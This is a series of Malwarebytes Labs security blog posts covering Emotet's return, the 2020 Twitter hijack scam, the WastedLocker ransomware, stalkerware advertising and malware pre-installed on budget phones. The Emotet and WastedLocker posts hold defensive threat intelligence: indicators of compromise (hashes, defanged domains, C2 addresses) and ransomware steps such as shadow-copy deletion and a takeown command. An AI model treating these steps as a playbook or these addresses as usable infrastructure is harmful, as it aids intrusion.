IT NEWS

This week on Lock and Code, we discuss the top security headlines generated right here on Labs and around the Internet. In addition, we talk to Chris Boyd, lead malware intelligence analyst for Malwarebytes, about Bluetooth and beacon technology.

Last month, cybersecurity experts warned the public about the data collection embedded in the Donald Trump 2020 re-election campaign’s mobile app. Once downloaded, the app requests broad access to user information, including device contacts, rough location, device storage, ID, call information, Bluetooth pairing, and more.

Tune in to hear about the progression of Bluetooth technology, how the tech is used in online advertising today, and more, on the latest episode of Lock and Code, with host David Ruiz.

You can also find us on the Apple iTunes store, Google Play Music, and Spotify, plus whatever preferred podcast platform you use.

We cover our own research on:

• Stalkerware advertising ban by Google. A step in the right direction, but there is more that needs to be done.
• Website misconfigurations and other errors that open up an avenue for attackers to abuse your site.
• A coordinated social engineering attack left Twitter in turmoil. Attackers used high profile Twitter accounts to get rich quick.
• The return of Emotet.

Plus other cybersecurity news:

• Google Cloud launches Confidential VMs, a new type of virtual machine that makes use of the company’s work around confidential computing to ensure that data isn’t just encrypted at rest but also while it is in memory. (Source: TechCrunch)
• The GoldenHelper malware found in China-mandated software is even more extensive than originally thought. (Source: ArsTerchnica)
• The Atlas of Surveillance shows which tech law enforcement agencies across the country have acquired. It’s a sobering look at the present-day panopticon. (Source: Wired)
• The Cybersecurity and Infrastructure Security Agency (CISA) told federal agencies to patch wormable Windows DNS bug in 24 hours. (Source: BleepingComputer)
• Blackrock is Android banking malware that can steal information from an estimated 337 apps, including Amazon, Facebook, Gmail and Tinder. (Source: Tom’s Guide)

Stay safe, everyone!

The post Lock and Code S1Ep11: Locating concerns of Bluetooth and beacon technology with Chris Boyd appeared first on Malwarebytes Labs.

No country, business, or person is immune to cybercrime, and as the Internet’s influence on our daily lives grows exponentially, so will the level of malicious activity throughout the world.

An ever-changing cyber landscape will always carry with it new threats, but are they the same for everyone? Who is attacked most often? Who is most at risk? And who is most exposed to cybercrime?

From endpoint attacks that are designed to gain unauthorized access, steal data, and extort money to cloud hacks that compromise and weaponize virtual machines, cybercrime can take many forms. And while new waves of threats evolve, cybersecurity hygiene doesn’t always follow suit.

There will always be a risk of falling victim to cybercrime, but it is important to remember that the very nature of risk can be boiled down to the chance that an event or situation will happen. A person, organization, or city could be at risk of an attack, but if they are prepared to defend against it, the situation is less dire.

Exposure, on the other hand, assumes an entity is subject to risk from a harmful action and, more importantly, that the entity will be negatively impacted by that risk.

Therefore, PasswordManagers.co chose to research the frequency of malicious attacks alongside the level of cybersecurity commitment across 108 countries to shine a spotlight on each country’s exposure to cybercrime.

Who is most exposed to cybercrime?

With a rating system from 0 to 1, the Cybersecurity Exposure Index calculates the level of exposure to cybercrime by country. The higher the score, the higher the exposure.

The post How exposed are you to cybercrime? appeared first on Malwarebytes Labs.

It was never a question of “if” but “when”. After five months of absence, the dreaded Emotet has returned. Following several false alarms over the last few weeks, a spam campaign was first spotted on July 13 showing signs of a likely comeback.

The Emotet botnets started pushing malspam actively on Friday, July 17, using the same techniques as it employed previously. Malicious emails contain either a URL or an attachment. One familiar technique is for the document to be sent as a reply within existing email threads.

The document contains a heavily obfuscated macro:

Once the macro is enabled, WMI launches PowerShell to retrieve the Emotet binary from one of the remote compromised websites. It will iterate through a list until it identifies one that is responding.

Once the payload is executed, it will send a confirmation back to one of Emotet’s command and control server.

Emotet has returned to its old tricks

The Emotet Trojan was by far the most visible and active threat on our radars in 2018 and 2019—right up until it went into an extended break.

Emotet is used by cybercriminals as the initial entry point, followed by a dwell time that can last days or weeks. In the meantime, other threats such as TrickBot can be delivered as a secondary payload.

The real damage that an Emotet compromise causes happens when it forms alliances with other malware gangs and in particular threat actors interested in dropping ransomware.

Malwarebytes users were already protected against Emotet thanks to our signature-less anti-exploit technology.

We also detect the Emotet binary as a standalone file:

Indicators of Compromise

Malicious documents

5d2c6110f2ea87a6b7fe9256affbac0eebdeee18081d59e05df4b4a17417492b
4fdff0ebd50d37a32eb5c3a1b2009cb9764e679d8ee95ca7551815b7e8406206
bb5602ea74258ccad36d28f6a5315d07fbeb442a02d0c91b39ca6ba0a0fe71a2
6d86e68c160b25d25765a4f1a2f8f1f032b2d5cb0d1f39d1d504eeaa69492de0
18fab1420a6a968e88909793b3d87af2e8e1e968bf7279d981276a2aa8aa678e
d5213404d4cc40494af138f8051b01ec3f1856b72de3e24f75aca8c024783e89

Compromised sites

elseelektrikci[.]com
rviradeals[.]com
skenglish[.]com
packersmoversmohali[.]com
tri-comma[.]com
ramukakaonline[.]com
shubhinfoways[.]com
test2.cxyw[.]net
sustainableandorganicgarments[.]com
staging.icuskin[.]com
fivestarcleanerstx[.]com
bhandaraexpress[.]com
crm.shaayanpharma[.]com
zazabajouk[.]com
e2e-solution[.]com
topgameus[.]com
cpads[.]net
tyres2c[.]com
thesuperservice[.]com
ssuse[.]com

Emotet binaries

454d3f0170a0aa750253d4bf697f9fa21b8d93c8ca6625c935b30e4b18835374
d51073eef56acf21e741c827b161c3925d9b45f701a9598ced41893c723ace23
1368a26328c15b6d204aef2b7d493738c83fced23f6b49fd8575944b94bcfbf4
7814f49b3d58b0633ea0a2cb44def98673aad07bd99744ec415534606a9ef314
f04388ca778ec86e83bf41aa6bfa1b163f42e916d0fbab7e50eaadc8b47caa50

C2s

178.210.171[.]15
109.117.53[.]230
212.51.142[.]238
190.160.53[.]126

The post It’s baaaack: Public cyber enemy Emotet has returned appeared first on Malwarebytes Labs.

“I’m feeling generous because of Covid-19. I’ll double any BTC payment sent to my BTC address for the next hour. Good luck, and stay safe out there!”

This and similar Tweets asking readers to send US$1,000 to a Bitcoin address with the promise of a double return payment went out yesterday.

Too good to be true?

Once again, social engineering has been demonstrated to be a powerful attack vector. Who would fall for such a ruse, you may ask? Looking at the traffic on said Bitcoin address, more than 100 people were duped.

The victims that sent Bitcoin to this address probably do not feel so good about themselves right now. But in their defense, some of the accounts that were Tweeting out these messages were trusted figures with verified Twitter accounts. To name a few: Elon Musk, Bill Gates, Barack Obama, Kanye West, Warren Buffet, Jeff Bezos, Joe Biden, and many other high-profile accounts were taken over.

What happened?

The official Twitter Support account states that their investigation is still ongoing, but it has revealed that threat actors gained unauthorized access and used it to take control of many highly-visible (including verified) accounts and Tweet on their behalf.

From other sources we learned that the threat actors managed to use social engineering on a Twitter employee to gain access to their control panel. Through the employee panel, they were able to change associated email addresses for many accounts to addresses under their control. They then used that as a means to reset the password for the account and disable 2FA.

During the ongoing Twitter storm of misleading Tweets, Twitter Support locked down the affected accounts and removed Tweets posted by the attackers as fast as they could find them. They also limited functionality for a much larger group of accounts, like all verified accounts (even those with no evidence of being compromised) during the investigation.

What should I do?

If you think you might be the owner of an affected account, you should:

• Not feel bad because this one was not on you
• Check if the address listed under email is yours
• Reset and change your password
• Enable 2FA

All these settings can be found when you are logged in on Twitter under More > Settings and privacy. Another setting that is worth considering is the Password reset protect which can be found under Additional password protection. Even though it probably would not have helped against this attack, it might help if you get a test or email when someone requests a password reset on your account. In this case, I’m pretty sure the employee panel would have allowed the attackers to disable that option as well.

Can victims retrieve Bitcoin?

Unfortunately, it is virtually impossible to get back stolen Bitcoin from the attackers. They are probably laundering the money right now. They will use Bitcoin mixing services to hide where the Bitcoin came from and Bitcoin exchange services to anonymously convert Bitcoin into spendable money.

The best move now is to scrutinize each and every request for donations, payments, or services—whether you know the person or not. Social engineering is a trick as old as time, and the reason it’s still so popular is that it still works.

Stay vigilant and stay safe, everyone!

The post Coordinated Twitter attack rakes in 100 grand appeared first on Malwarebytes Labs.

Website owners, listen up: There are lots of things you shouldn’t do with your site, and many more you should avoid with the domains you’re responsible for. Insider malice, bad luck, and the stars aligning in impossible ways can all give your online portfolio a bad hair day. However, if you want to tempt fate, you can bring on the mayhem with website misconfigurations and other ill-fortuned security and privacy errors.

In the last week, we’ve seen a few of these website mistakes go public, so we wanted to give site owners a gentle reminder to watch out for easily avoidable, but even easier to walk into—and pay the piper afterwards—errors.

Spoiler alert: Do not pay the piper.

Paying the piper: Salacious subdomains

Subdomains are a great way to add depth to your website, branching off from the main domain and allowing for content categorization. They can help make huge, unwieldy portals a little more manageable.

Problems arise when someone creates a bunch of complicated subdomains resolving to different places, and they later fall into a state of abandonment, as was the case with several mega-corporations, including Chevron, the Red Cross, and Getty Images. This unfortunately leads to issues the subdomains were never intended to address.

Opportunists took note of the sheer number of abandoned official subdomains and figured out a way to game the Azure system powering everything behind the scenes. If you didn’t know, Azure is Microsoft-powered cloud technology with a big splash of virtualisation thrown into the mix. 

What did they do?

I’ll give you a straightforward, non-Azure related example. You set up a website, yourwebsite(dot)com. You don’t want to bother with managing hosting and all the nitty-gritty that comes with it, so you point your URL at a website hosted on a free platform. Let’s go with yourwebsite(dot)freebloggingplatform(dot)com.

After a while, you become bored with your website and it falls into disrepair. You haven’t touched it in months, but someone got their hands on the blog the URL was pointing at, compromised it, and turned it into a horrendous pornography spam farm.

Imagine something similar with Azure, except instead of a straightforward top-level domain (the landing page for your website), you created lots of subdomains like myfavouritemovies(dot)yourwebsite(dot)com and myfavouritebooks(dot)yourwebsite(dot)com.

Each of these subdomains pointed to hosted webspace on Azure, and when the organisation no longer needed the hosted space, it was released back into the wild for anybody else to grab. Unfortunately, someone in admin land forgot to stop pointing the subdomain(s) at the now relinquished Azure pages and it’s at this point the scammers swoop in.

Congratulations, website owner: You now have a forgotten-about subdomain with a good search engine page rank pointing at newly-created spam/porn/drugs/who-knows-what content.

It’s not just spam and dodgy deals you must be wary of. You could find yourself pointing your website at phishing scams, or malware installs, or potentially illegal content. It might be used for cookie harvesting or any number of awful Internet shenanigans you don’t want to get tangled up in.

You could easily be directed to a site playing host to credit card skimmers.

These so-called “dangling DNS entries” now have a support page over on the Microsoft portal, and it’s well worth a read if you expect to be managing subdomains in the near future. These kinds of attacks are almost certainly automated, so you can expect your org to be caught up if some spare subdomains are left out in the cold waving a large “please hijack me” sign.

Keep your subdomains safe, register your domains in Google Search Console, and make sure your big list of DNS antics are on an actual list. Here are some more tips on how to fix a subdomain takeover, if you’re interested.

Paying the piper: Any road is code

A CDN is a content delivery/distribution network. They’re the bits and pieces of the Internet tapestry theoretically close to where you’re located, with the task of bypassing bottlenecks and hurling content in your direction faster than it would’ve arrived otherwise.

And now, for the somewhat more cynical take: If you’ve ever loaded up a website and marveled at how slow the content was but how fast the 26 adverts were, loading before the site did: That’s the wonder of a decent CDN.

Anyway.

CDNs can be used to serve up various bits and pieces of a site as and when required. It’s not uncommon for chunks of code to be pumped into the page from multiple sources, but you must offset that against the risk of the site breaking.

But what if the CDN has been serving up bad files and finds itself on a block list? What if it simply fails to load and breaks the website’s functionality? There are all sorts of things that can go wrong with that kind of setup.

What happened?

Something you probably wouldn’t expect to see is a major bank using the Internet Archive as a CDN resource. The Internet Archive is where old websites and other content live on, and it’s tremendously helpful for archival purposes. 

For some peculiar reason, Barclays bank was linking directly to an archived page to serve up their own JavaScript code. Barclays have no control over the content hosted on the Internet Archive, and if someone managed to tamper with the code, it could give banking customers quite the headache (or the site could simply lose functionality if Internet Archive went down or the page was removed for whatever reason).

Now I’m thinking back—again—to the various caveats and requirements banks place on customers to make sure they’re doing their due diligence. How would banking customers have any idea about this going on under the hood if it ended up causing them some sort of security issue? Would suspicion first fall upon the customer? How would they prove they weren’t to blame for something going wrong?

Sometimes organisations lose bits of code and have no backups. I don’t think that’s likely in this case, but if you don’t want to end up in a similar situation and start grabbing files/links from somewhere like Internet Archive, please make backups. (And check where, exactly, you’re copying and pasting code from.)

Paying the piper: breaking down the breakdowns

Those are just two of the most recent examples of website mishaps that can lead to malicious takeovers or simply result in an inability to function. Those aren’t the only ways for things to go wrong, though. What else should you be looking out for and doing?

Update, update, update. If you don’t, people could bludgeon their way into your content management system/blogging platform and stuff the site with SEO spam. If your site ends up in the news for an unrelated reason, you could inadvertently drive lots of visitors to potentially bad places.

Think about all those credentials you have tied to your platforms. Is everybody listed still working at your organisation? Or do you have lots of insecure admin accounts with basic passwords scattered about the place?

Has the platform you use to power your blog been abandoned? If it’s no longer updated, you could well receive a visit from the website hack inspector. Even the biggest organisations are not immune to the perils of platform mishaps. You’ll never know the impact until everything is already burning away in some sort of digital firestorm.

It may well be worth drawing up a short digital to-do list and giving your site an inspection, because so many intrictate moving parts almost demand the wheels coming off at some point. Get ahead of the curve, throw on your welding goggles, and give that site of yours the tuneup inspection of a lifetime.

The post Website misconfigurations and other errors to avoid appeared first on Malwarebytes Labs.

On Friday, July 10, Google announced it would no longer allow advertising for spyware and similar surveillance technology—often referred to as “stalkerware”—on its platform.

The change is a welcome step by one of the largest, most powerful companies in online advertising, but a close read of the policy reveals a potential loophole that could allow stalkerware-type app makers to still advertise their products on Google. Simply put, these companies could skirt the rules by changing the face of what they’re selling, without changing the core technology within.

We hope this exception will soon be addressed.

For over a year, Malwarebytes has charged ahead on a renewed commitment to protecting users and domestic abuse survivors from the threats posed by stalkerware. These apps can give individuals the opportunity to pry into text messages, emails, and call logs, rifle through web browsing and GPS location history, and reveal sensitive photos, videos, and social media activity, all without consent.

In our advocacy to protect users from these threats, we have spoken directly to domestic abuse survivors. We have provided device security trainings to local domestic abuse support organizations and family justice centers. We have met with devoted law enforcement officials. We helped launch the Coalition Against Stalkerware as a founding partner. We have contributed to research studies and we have increased our own detections for our two, internal categories of applications that provide capabilities to spy on user activity without consent: “monitor” apps and “spyware” apps.  

Through our continued work, we’ve learned that one of the ways that stalkerware-type apps avoid scrutiny is through potentially deceptive marketing campaigns that brand themselves as safe tools for parental monitoring. It is unfortunate that these same tactics could prove effective for bypassing Google’s new policy.

The change, the exception, and the problem

According to Google, the company’s updated advertising policy will “prohibit the promotion of products or services that are marketed or targeted with the express purpose of tracking or monitoring another person or their activities without their authorization.” The updated policy will take effect August 11, 2020.

In responding to a question as to why Google decided to now announce this updated, a spokesperson said: “We constantly evaluate and update our ad policies to ensure we are protecting users. We routinely update our language with examples to help clarify what we consider policy violating. Spyware technology for partner surveillance was always in scope of our policies against dishonest behavior.”

The updated policy applies to “spyware and technology used for intimate partner surveillance including but not limited to spyware/malware that can be used to monitor texts, phone calls, or browsing history; GPS trackers specifically marketed to spy or track someone without their consent;” and “promotion of surveillance equipment (cameras, audio recorders, dash cams, nanny cams) marketed with the express purpose of spying.”

The non-exhaustive list captures some of the current types of invasive tools available today. But further down in its policy update, Google explained that there are exceptions to the new rule. The policy will not apply to “private investigation services” or “products or services designed for parents to track or monitor their underage children.”

The problem, as we reported nearly one year ago on Malwarebytes Labs, is that the line between stalkerware-type applications and parental monitoring applications can be blurred.

As we wrote before:

“Emory Roane, policy counsel at Privacy Rights Clearinghouse, said that, not only are the technical capabilities of stalkerware apps and parental monitoring apps highly similar, the capabilities themselves can be found within the type of hacking tools used by nation states.

‘If you look at the capabilities: What results can be gathered from devices implanted with stalkerware versus devices hacked by nation states? It’s the same,’ Roane said. ‘Turning on and off the device remotely, key loggers, tracking via GPS, all of this stuff.’”

What’s more is that sometimes, apps that previously marketed themselves as tools for potentially spying on romantic partners and spouses can then quickly turn around and masquerade as parental monitoring apps.

Erica Olsen, director of the Safety Net project for the National Network to End Domestic Violence, said she personally saw these “rebranding” tactics herself when then-Senator Al Franken introduced legislation to prohibit the use of apps which could reveal a person’s GPS location without their knowledge or consent.

“After the public legislative hearings Al Franken held on location-based apps and stalking products, a ton of them changed their marketing almost overnight,” said Olsen, who also shared that Google’s updated policy is a move in the right direction. “We held up large, blown-up images of their problematic marketing and they removed it. But they didn’t change the basic functionality of the apps that allowed them to be used for these behaviors. That spoke volumes.”

Last year, Twitter allowed sponsored tweets that advertised an app that can track call logs, text messages, GPS location, web browsing history, and social media activity, and reveal sensitive photos and videos. The advertisement portrayed a man lying down in bed, checking his phone. Written across the advertisement were the words: “What is she hiding from you?”

Twitter took the advertisement down after users grew incensed. According to VICE, Twitter explained its takedown by saying: “The app violates our Malware and Software Download Policy and will no longer be allowed to advertise on the platform.”

This was a swift move by Twitter, but today, that same app markets itself on its own website as a tool for parental monitoring.

On Friday, computer security writer Graham Cluley raised the same issues we are raising here—that some stalkerware-type apps may still be able to advertise on Google, simply by changing their advertising strategy.

“Sadly, I doubt Google’s ad ban will stop stalkerware apps from promoting themselves,” Cluley wrote, “it’s just they may no longer be able to be quite so explicit in their online adverts about how they are most likely to be used.”

Next steps against stalkerware

As a founding partner in the Coalition Against Stalkerware, Malwarebytes understands that the threats of stalkerware are multifaceted, and responding to these threats requires cross-disciplinary support. That includes the commitment of online advertiser platforms to remove spaces for companies that deliberately advertise the potential of privacy as a product feature.

Despite the carve-outs to Google’s updated advertising policy, the company’s overall intention here is good.

Our commitment to protecting users from these the threats of stalkerware-type apps continues. We welcome others to join.

The post Stalkerware advertising ban by Google a welcome, if incomplete, step appeared first on Malwarebytes Labs.

Last week on Malwarebytes Labs, we took an in-depth look at card skimmers targeting ASP sites, we released another episode of Lock and Code exploring the Internet of Things, and we dug into a Mac mystery. We also examined some pre-installed malware, and put out a threat spotlight on some customized ransomware.

Other cybersecurity news

• Social media went head to head with lawmakers: User data was up for debate as the giants in the space grappled with Hong Kong’s new national security law (Source: The Register)
• Magecart lurked on hundreds of sites: a major headache for both shopping portals and consumers (Source: Gemini Advisory)
• Cyber attackers upped their game: Explosion at nuclear plant blamed on hackers (Source: Computing)
• Maxing the macros: Ransomware attacks highlighted that Macros haven’t gone away as a route into systems (Source: Bleeping Computer)
• Stay healthy: Bots are increasingly targeting the healthcare sector (Source: Imperva)
• Disinformation clampdown: Facebook came out swinging against dubious information posted to the site (Source: BBC)
• Zoom and doom: Fake Zoom notifications were spotted going phishing (SC Magazine)
• No joke: Android malware proved troublesome for the Google Play store (Source: Forbes)
• School’s in: Now’s the time to steer clear of potential “back to school” scams (Source: Tessian)
• Covid-19 phishing: Law enforcement warned the public to be wary of refund shenanigans (Source: Times of India)

Stay safe, everyone!

The post A week in security (July 6 – 12) appeared first on Malwarebytes Labs.

WastedLocker is a new ransomware operated by a malware exploitation gang commonly known as the Evil Corp gang. The same gang that is associated with Dridex and BitPaymer.

The attribution is not based on the malware variants as WastedLocker is very different from BitPaymer. What was kept was the ability to add specific modules for different targets.

The attacks performed using WastedLocker are highly targeted at very specific organizations. It is suspected that during a first penetration attempt an assessment of active defenses is made and the next attempt will be specifically designed to circumvent the active security software and other perimeter protection.

The ransomware name is derived from the filename it creates which includes an abbreviation of the victim’s name and the string “wasted”.

For each encrypted file, the attackers create a separate file that contains the ransomware note. The ransom note has the same name as the associated file with the addition of “_info”.

The ransom demands are steep, ranging from $500,000 to over $10 million in Bitcoin. Given that the operators make every effort to go after any backups, some organizations may feel the need to pay up. Where other ransomware operators are adding the exfiltration and even auction of stolen data to their arsenal, the Evil Corp gang has shown no inclination in that direction yet.

Historically the Evil Corp gang targets mostly US organizations and it looks like they are staying on that track with a few victims in Europe. The main players in the group are believed to be Russian.

The importance of offline backups

In general, we can state that if this gang has found an entrance into your network it will be impossible to stop them from encrypting at least part of your files. The only thing that can help you salvage your files in such a case is if you have either roll-back technology or a form of off-line backups. With online, or otherwise connected backups you run the chance of your backup files being encrypted as well, which makes the whole point of having them moot. Please note that the roll-back technologies are reliant on the activity of the processes monitoring your systems. And the danger exists that these processes will be on the target list of the ransomware gang. Meaning that these processes will be shut down once they gain access to your network.

As you may have noticed this is a very sophisticated and highly targeted type of ransomware. Which means that, given the ransom demands, most of the affected companies will have a dedicated cyber- security department. It is imperative that this staff is alert on the early warning signs of these attacks which may be indicated by breach attempts. At later stages more disruptive actions may be taken, such as disabled security software, dropped files, and deleted backups

Unlike other ransomware operators Evil Corp does not exfiltrate stolen data and publish or auction the data that belong to “clients” that are unwilling to pay the ransom.

Infection details

One of the methods found to date is the usage of fake software update alerts embedded in existing websites.

The malware from these websites is a penetration testing and exploration kit designed to create a foothold and gather information about the network. Historically Evil Corp has targeted file servers, database services, virtual machines, and cloud environments.

Once the exploration phase has completed the gang will drop the ransomware on the compromised systems.

The ransomware itself is custom built for each client so there is nothing to be gained by doing a full analysis. The attacks do have some commonalities though which we will discuss here.

• Deletes shadow copies, which are the default backups made by the Windows OS.
• The main executable for the ransomware is copied to the system folder and gets elevated permissions
• A service is created that runs during encryption.
• During encryption the encrypted files are renamed, and the ransom notes are created.
• A log file is created that lists the number of targeted files, the number of encrypted files, and the number of files that were not encrypted due to access rights issues.
• The service is stopped and deleted.

Overview

• WastedLocker has been actively deployed since May 2020.
• Evil Corp behind: this group previously associated to the Dridex malware and BitPaymer aka IEcrypt aka FriedEx aka WastedLocker.
• Evil Corp has been using WastedLocker to request ransoms in the range of millions of USD, with some demands going above $10 million.
• WastedLocker replaces BitPaymer in the group’s operations.
• Technically, WastedLocker does not have much in common with BitPaymer
• The ransomware name is derived from the filename it creates which includes an abbreviation of the victim’s name and the string ‘wasted’. 
• Encrypted files extension is set according to the targeted organisations name along with the prefix wasted
• Example: test.txt.orgnamewasted (encrypted data) and test.txt.orgnamewasted_info (ransomware note)
• No data theft and no leak site.
• Each ransomware victim has a custom build configured or compiled for them.
• Note contains: Protonmail and Tutanota email domains, as well as Eclipso and Airmail email addresses. The email addresses listed in the ransom messages are numeric – usually 5 digit numbers.

Infection highlights

• Delete shadow copies
• Copy the ransomware binary file to %windir%system32 and take ownership of it (takeown.exe /F filepath) and reset the ACL permissions. In other cases an Alternate Data Stream (ADS) is used as a means to run the ransomware processes.
• Create and run a service. The service is deleted once the encryption process is completed.

IOC’s

*wasted and *wasted_info filenames for encrypted files and the ransom notes

Basic layout of the content of the ransom note:

*ORGANIZATION_NAME*
YOUR NETWORK IS ENCRYPTED NOW
USE *EMAIL1* | *EMAIL2* TO GET THE PRICE FOR YOUR DATA
DO NOT GIVE THIS EMAIL TO 3RD PARTIES
DO NOT RENAME OR MOVE THE FILE
THE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:
[begin_key]*[end_key]
KEEP IT

The email addresses are usually numeric and 5 digits, one at Protonmail and the other at Airmail, but we have also seen Tutanota and Eclipso email addresses.

Malwarebytes detection

Malwarebytes detects WastedLocker ransomware as Ransom.BinADS.

Stay safe everyone!

The post Threat spotlight: WastedLocker, customized ransomware appeared first on Malwarebytes Labs.

We have discovered, yet again, another phone model with pre-installed malware provided from the Lifeline Assistance program via Assurance Wireless by Virgin Mobile.  This time, an ANS (American Network Solutions) UL40 running Android OS 7.1.1.  

After our writing back in January—”United States government-funded phones come pre-installed with unremovable malware“—we heard an outcry from Malwarebytes patrons.  Some claimed that various ANS phone models were experiencing similar issues to the UMX (Unimax) U683CL.  However, it’s very hard to verify such cases without physically having the mobile device in hand. For this reason, I could not confidently write about such cases publicly. Thankfully, we had one Malwarebytes patron committed to proving his case. Thank you to Malwarebytes patron Rameez H. Anwar for sending us your ANS UL40 for further research! Your cyber-security expertise and persistence into this case will surely aid others!

Clarification of availability

To clarify, it is unclear if the phone in question, the ANS UL40, is currently available by Assurance Wireless. However, the ANS UL40 User Manual is listed (at the time of this writing) on the Assurance Wireless website.

Therefore, we can only assume it is still available to Assurance Wireless customers. Regardless, the ANS UL40 was sold at some point and some customers could still be affected.

Infection types

Just like the UMX U683CL, the ANS UL40 comes infected with a compromised Settings app and Wireless Update app. Although this may be true, they are not infected with the same malware variants. The infections are similar but have their own unique infection characteristics. Here’s a rundown of the infected apps.

Settings

• Package Name: com.android.settings
• MD5: 7ADA4AAEA49383499B405E4CE0A9447F
• App Name: Settings
• Detection: Android/Trojan.Downloader.Wotby.SEK

The Settings app is exactly what it sounds like—it is the required system app used to control all the mobile device’s settings. Thus, removing it would leave the device unusable. For the case of the ANS UL40, it is infected with Android/Trojan.Downloader.Wotby.SEK.

Proof of infection is based on several similarities to other variants of Downloader Wotby. Although the infected Settings app is heavily obfuscated, we were able to find identical malicious code. Additionally, it shares the same receiver name: com.sek.y.ac; service name: com.sek.y.as; and activity names: com.sek.y.st, com.sek.y.st2, and com.sek.y.st3. Some variants also share a text file found in its assets directory named wiz.txt. It appears to be a list of “top apps” to download from a third-party app store.  Here’s snippet of code from the text file.

To be fair, no malicious activity triggered for us from this infected Settings app. We were expecting to see some kind of notification or browser popup populated with info from the code above displayed. Unfortunately, that never happened. But we also didn’t spend the normal amount of time a typical user would on the mobile device. Nor was a SIM card installed into the device, which could impact how the malware behaves. Nevertheless, there is enough evidence that this Settings app has the ability to download apps from a third-party app store. This is not okay. For this reason, the detection stands.

Although unsettling, it’s important to note that the apps from the third-party app store appear to be malware-free. This was verified by manually downloading a couple for ourselves for analysis. That’s not to say that malicious versions couldn’t be uploaded at a later date. Nor did we verify every sample. Nevertheless, we believe the sample set we did verify holds true for other apps on the site. Under those circumstances, even if the ANS’s Settings app had downloaded an app from the list, it’s still not as nefarious as the Settings app seen on the UMX U683CL.

WirelessUpdate

• Package Name: com.fota.wirelessupdate
• MD5: 282C8C0F0D089E3CD522B4315C48E201
• App Name: WirelessUpdate
• Detections: Three variants of Android/PUP.Riskware.Autoins.Fota
  • Variants .INS, .fscbv, and .fbcv

WirelessUpdate is categized as a Potentially Unwanted Program (PUP) riskware auto-installer that has the ability to auto-install apps without user consent or knowledge. It also functions as the mobile device’s main source of updating security patches, OS updates, etc.

Android/PUP.Riskware.Autoins.Fota in particular is known for installing various variants of Android/Trojan.HiddenAds—and indeed it did! In fact, it auto installed four different variants of HiddenAds as seen below!

• Package Name: com.covering.troops.merican
• MD5: 66C7451E7C87AD5145596012C6E9F9A0
• App Name: Merica
• Detection: Android/Trojan.HiddenAds.MERI

• Package Name: com.sstfsk.cleanmaster
• MD5: 286AB10A7F1DDE7E3A30238D1D61AFF4
• App Name: Clean Master
• Detection: Android/Trojan.HiddenAds.BER

• Package Name: com.sffwsa.fdsufds
• MD5: 4B4E307B32D7BB2FF89812D4264E5214
• App Name: Beauty
• Detection: Android/Trojan.HiddenAds.SFFW

• Package Name: com.slacken.work.mischie
• MD5: 0FF11FCB09415F0C542C459182CCA9C6
• App Name: Mischi
• Detection: Android/Trojan.HiddenAds.MIS

Payload drop verification

Now you might be wondering, “How did you verify which of the two pre-installed infected system apps is dropping the payloads?” The process works as follows. You disable one of them upon initially setting up the mobile device. In both the UMX and ANS cases, picking which one to disable was easy to decide. That’s because disabling the Settings app renders the phone unusable. So, disabling WirelessUpdate was the obvious choice in both cases. The next step in the process is waiting a couple of weeks to see if anything happens. And yes, you sometimes need to wait this long for the malware to drop payloads. If nothing happens after a couple of weeks, then it’s time to re-enable the infected system app again and start the waiting game all over.

Using this process, we found in the case of the UMX U683CL, the Settings app was the culprit. For the ANS UL40, after not seeing any dropped payload(s) for weeks, I re-enabled WirelessUpdate. Within 24 hours, it installed the four HiddenAds variants! Caught red-handed, WirelessUpdate!

The tie between UMX and ANS

With our findings, we imagine some are left wondering: Is this a correlation or coincidence? We know that both the UMX and ANS mobile devices have the same infected system apps. However, the malware variants on the U683CL model and the UL40 are different. As a result, I initially didn’t think there was any ties between the two brands. I summed it up to be a coincidence rather than a correlation. That is until I stumbled upon evidence suggesting otherwise. 

The Settings app found on the ANS UL40 is signed with a digital certificate with the common name of teleepoch. Searching teleepoch comes up with the company TeleEpoch Ltd along with a link to their website. Right there on the homepage of TeleEpoch Ltd it states, Teleepoch registered brand “UMX” in the United States. 

Let’s review. We have a Settings app found on an ANS UL40 with a digital certificate signed by a company that is a registered brand of UMX.  For the scoreboard, that’s two different Settings apps with two different malware variants on two different phone manufactures & models that appear to all tie back to TeleEpoch Ltd. Additionally, thus far the only two brands found to have preinstalled malware in the Settings app via the Lifeline Assistance program are ANS and UMX.

This led me to do further research into the correlation by looking at cases in our support system of other ANS models that might have preinstalled malware. That’s when I found the ANS L51. For the record, the L51 was another model being boasted as having preinstalled malware within the comments of the UMX article in January. I discovered that the ANS L51 had the same exact malware variants as the UMX U683CL! There, within previous support tickets, was hard proof of the ANS L51 infected with Android/Trojan.Dropper.Agent.UMX and Android/PUP.Riskware.Autoins.Fota.fbcvd. Driving home the triage of TeleEpoch, UMX, and ANS correlation! 

Solutions

We have the utmost faith that ANS will quickly find a resolution to this issue. Just as UMX did as stated in the UPDATE: February 11, 2020 section of the January writing. As a silver lining, we did not find the Settings app on the ANS to be nearly as vicious as on the UMX.  Thus, the urgency is not as severe this time around.

In the meantime, frustrated users with the ANS UL40 can halt the reinfection of HiddenAds by using this method to uninstall WirelessUpdate for current user (details in link below):

Removal instructions for Adups

Warning: Make sure to read Restoring apps onto the device (without factory reset) in the rare case you need to revert/restore app.  For instance, if you like to restore WirelessUpdate to check if there are important system updates.

Use this/these command(s) during step 7 under Uninstalling Adups via ADB command line to remove:

adb shell pm uninstall -k –user 0 com.fota.wirelessupdate

Budget should not equate to malware

There are tradeoffs when choosing a budget mobile device. Some expected tradeoffs are performance, battery life, storage size, screen quality, and list of other things in order to make a mobile device light on the wallet. 

However, budget should never mean compromising one’s safety with pre-installed malware. Period.

The post We found yet another phone with pre-installed malware via the Lifeline Assistance program appeared first on Malwarebytes Labs.

This week on Lock and Code, we discuss the top security headlines generated right here on Labs and around the Internet. In addition, we talk to JP Taggart, senior security researcher at Malwarebytes, about the Internet of Things.

For years, Internet capabilities have crept into modern consumer products, providing sometimes convenient, sometimes extraneous Internet connectivity. This increase in IoT devices has an obvious outcome—a broader attack surface for threat actors. Not only that, but with more devices connecting to the Internet, there are also more devices collecting your data and analyzing it to send you more ads, more frequently, for more products.

Tune in to hear about the development of IoT devices, their cybersecurity and data privacy lapses, and more, on the latest episode of Lock and Code, with host David Ruiz.

You can also find us on the Apple iTunes store, Google Play Music, and Spotify, plus whatever preferred podcast platform you use.

We cover our own research on:

• Of Bluetooth and beacons: We took a look at how companies use Bluetooth to track you and use that capability for their benefit.
• A malicious installer of the Little Snitch app was brought to our attention, and it happens to be a new Mac ransomware we now call ThiefQuest.
